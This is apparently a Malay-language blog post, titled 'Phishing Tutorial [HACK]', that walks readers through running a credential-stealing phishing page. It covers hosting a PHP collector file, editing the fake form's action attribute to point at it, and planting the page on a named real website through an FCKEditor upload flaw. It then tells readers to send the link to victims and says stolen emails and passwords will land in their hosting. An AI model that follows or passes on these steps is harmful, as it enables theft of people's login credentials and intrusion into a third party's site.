Home > Hack Release > Phishing Tutorial [HACK]

Phishing Tutorial [HACK]

Hari ini aku nk ajar anda cara phishing yg TAK AKAN KENA BAN.aq dah test.sbb memang aq guna cara ni.hehehe…baiklah jom mula…
Sebelum tu kepada yg masih x tahu cara nk register webhosting dan create phishing page di dalam file manager boleh rujuk sini:
Phishing Facebook

Langkah 1- Create file .php di webhosting :

Create file .php anda di webhosting.

Langkah 2 – Copy Link File .php anda :

Copy link file .php anda.
Tengok pada file php anda.tengok pada “open”
Right click pada “open”, dan copy link

Langkah 3 – Edit File Html :

Selepas itu, edit file html anda di dalam notepad.

Cara2nya :

1. tekan CTRL+F

2. Cari perkataan :  action=

3. setelah anda menjumpainya,anda akan nmpak di depan action= cuma tertera nama file.
Contoh:
action=’write.php’

4. Anda harus tukarnya kepada link file php anda.
Contoh:
action=’domain.hosting.com/apa2.php <—- nama file php anda

5. Setelah siap, save file html anda itu.

 Langkah 4 – Upload file phishing menggunakan FCKEditor :
Note : Bagi yg masih belum tahu cara nk upload file menggunakan FCKeditor bolehlah rujuk sini : FCKEditor Deface

1. Baiklah sekarang anda harus upload file html anda itu menggunakan FCKEditor.Setelah itu anda bolehlah test phishing anda itu!!

Website vuln cadangan :
http://www.schoolshopper.com.au

Contoh Link Phishing anda :
http://www.schoolshopper.com.au/phishing.html

2. Sekarang anda boleh lah menghantar link phishing anda itu kepada mangsa anda!

note1 : phishing ini sama seperti phishing biasa.file yg berisi password dan email akan muncul di dalam webhosting anda.cuma kelainannya webhosting tidak akan dapat kesan file phishing.
note2 : anda tidak perlu delete file php anda yg berada di dalam webhosting anda itu setelah habis phishing.

Categories: Hack Release
  1. No comments yet.
  1. No trackbacks yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: